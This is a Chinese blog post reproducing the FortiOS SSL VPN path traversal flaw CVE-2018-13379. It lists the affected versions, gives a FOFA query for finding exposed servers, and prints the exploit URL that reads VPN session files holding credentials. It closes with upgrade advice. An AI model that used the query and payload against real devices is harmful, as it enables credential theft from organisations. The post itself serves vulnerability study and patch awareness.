Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379)

最新推荐文章于 2024-09-30 17:49:23 发布
最新推荐文章于 2024-09-30 17:49:23 发布
阅读量4.2k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_40293958/article/details/107206259
版权
本文介绍了Fortinet FortiOS的CVE-2018-13379漏洞,这是一个SSL VPN中的目录遍历漏洞,允许攻击者访问受限目录之外的文件。受影响的版本包括FortiOS 5.6.3到5.6.7及6.0.0到6.0.4。文中还提及了环境搭建、漏洞分析、验证方法以及防御措施,建议升级到5.6.8、6.0.5或6.2.0来防范。
摘要由CSDN通过智能技术生成

1 漏洞简介

早在2019年5月24日,飞塔官方就发布了CVE-2018-13379漏洞的安全公告,但直到8月份才有漏洞Exp流出,导致漏洞蔓延。

据官方介绍,CVE-2018-13379是SSL VPN中的一个目录遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可利用该漏洞访问受限目录之外的文件。

受影响的版本:

FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4

2 环境搭建

使用FOFA中搜索飞塔SSL VPN服务器,
body=“FortiToken clock drift detected”

可以看到有15.3万个独立IP,搜索结果如下图:

在这里插入图片描述

*Username:*

*Password:*

3 漏洞分析

4 漏洞验证

https://网址/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

poc验证
在这里插入图片描述

5 漏洞防御

更新至FortiOS 5.6.8,6.0.5或6.2.0

参考链接

https://www.cnblogs.com/dgjnszf/p/11355242.html
https://github.com/milo2012/CVE-2018-13379
https://www.anquanke.com/vul/id/1621233

最低0.47元/天 解锁文章
槑_13
关注
专栏目录
实验室:用于安全性分析的漏洞实验室
02-05
名称描述CVE-2015-5531 1.6.1之前的Elasticsearch中的目录遍历漏洞允许远程攻击者通过与快照API调用相关的未指定向量读取任意文件。 CVE-2016-1909 5.0.12之前的Fortinet FortiAnalyzer和5.2.5之前的5.2.x; 3.3.3...
CVE-2018-13382 环境搭建+漏洞复现
yxngu
07-30 1625
芝兰生于深山,不以无人而不芳
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6932
正入万山圈子里,一山放过一山拦。
路径遍历漏洞
最新发布
2301_81242582的博客
09-30 386
路径遍历也称目录遍历,这些漏洞使攻击者能够读取运行应用程序的服务器上的任意文件,这可能包括:应用程序代码和数据,后端系统的凭据,敏感的操作系统文件,在某种情况下,攻击者可能写入服务器上的任意文件,从而允许他们修改应用程序和行为,并最终完全控制服务器。
Fortinet FortiOS路径遍历漏洞 CVE-2018-13379
limb0的博客
11-09 6305
Fortinet FortiOS路径遍历漏洞 CVE-2018-13379 一、漏洞介绍 Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上,安全研究人员公布了Fortinet FortiOS多个漏洞,包括For...
Fortigate SSL VPN路径遍历漏洞CVE-2018-13379
weixin_44304678的博客
11-06 1029
Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。
ssl漏洞复现
让每一行代码都有改变世界的力量
01-03 523
GET请求改地址,可查看用户名 密码说明存在漏洞
网络靶场实战--飞塔(Fortinet)防火墙认证绕过漏洞(CVE-2022-40684)
蛇矛实验室
12-13 5269
我们这一小节简单了解了身份认证绕过流程,分析并复现了fortigate防火墙身份认证绕过漏洞的形成过程以及如何利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
Fortinet NSE 4 NSE4 FGT-6.4 Exam Updated Dumps.pdf
06-16
Fortinet NSE 4 NSE4 FGT-6.4 Exam Updated Dumps.pdf
FortiOS管理员手册606-第04章-SD-WAN.pdf
09-12
FortiOS是Fortinet公司开发的网络操作系统,广泛应用于其安全网关产品FortiGate中。FortiOS 6.0.6版本的管理员手册第四章专门讲述了软件定义广域网(SD-WAN)的相关知识和技术细节,SD-WAN是一种网络技术,能够利用...
Fortinet FortiOS 7.2.4 Administration Guide
04-26
Fortinet FortiOS 7.2.4 Administration Guide 飞塔防火墙管理员配置向导v7.2.4 2023年4月24日发布
FortiGate 100D防火墙最新FortiOSV6.0.3build0200固件
10-24
FortiGate 100D防火墙最新FortiOS V6.0.3build0200固件,主要是修复bug,比之前的版本都稳定。
Fortinet-NSE7-EFW-7.0 -.pdf
04-08
Fortinet_NSE7_EFW-7.0 内容丰富,适合初学者
CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞
江左盟的博客
10-31 5758
FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。
重生之我是赏金猎人-SRC漏洞挖掘(十二)-记一次对抗飞塔流量检测的文件上传
J0o1ey Blog
02-16 545
重生之我是赏金猎人-SRC漏洞挖掘(十二)-记一次对抗飞塔流量检测的文件上传 善用编码、宽字节,熟知每种开发语言的特性,是绕过WAF不可或缺的基本功特殊情况下,思路灵活可以出奇制胜~
漏洞预警丨Fortinet FortiOS & FortiProxy越界写入漏洞CVE-2024-21762)
C20220511的博客
03-18 1123
Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。在SSL VPN组件中存在越界写入漏洞,可能导致未经身份验证的远程威胁者通过特制HTTP请求执行任意命令或代码。daydaypoc漏洞平台于2024年3月12日已收录该漏洞。越界写入/远程命令执行。
(自用POC)Fortinet-CVE-2022-40684
qq_50854662的博客
03-13 1319
(自用POC)Fortinet-CVE-2022-40684
说说 Nginx 日志(Log)在网站安全上的重要性
草根博客站长明月登楼的CSDN博客
05-31 873
好了,最后明月再强调一下,就算你看不懂 Nginx 日志,明月也建议你开启和保留日志记录,这样就算真的碰到什么安全问题了,专业人士也能很快的给你排查出问题所在和制定合理科学的解决方案,否则就算是个高手也会因为“巧妇难为无米之炊”而束手无策呀!
Nginx 日志中的各种爬虫汇总和屏蔽操作
xhx836161547的博客
03-13 2200
转载原作者的一篇有关nginx的流量记录
CVE-2018-13380
06-06
CVE-2018-13380是一种影响Fortinet FortiOS 6.0.0至6.0.4版本的漏洞,攻击者可以利用该漏洞获取管理员账户的密码,并且可以通过获取的密码执行任意代码或者导致拒绝服务攻击。该漏洞是由于FortiOS中的一个未经身份验证的远程攻击者可以直接访问FortiOS系统上的文件而引起的。Fortinet公司已经发布了修补程序来解决此问题,并强烈建议用户升级到最新版本以避免受到此漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值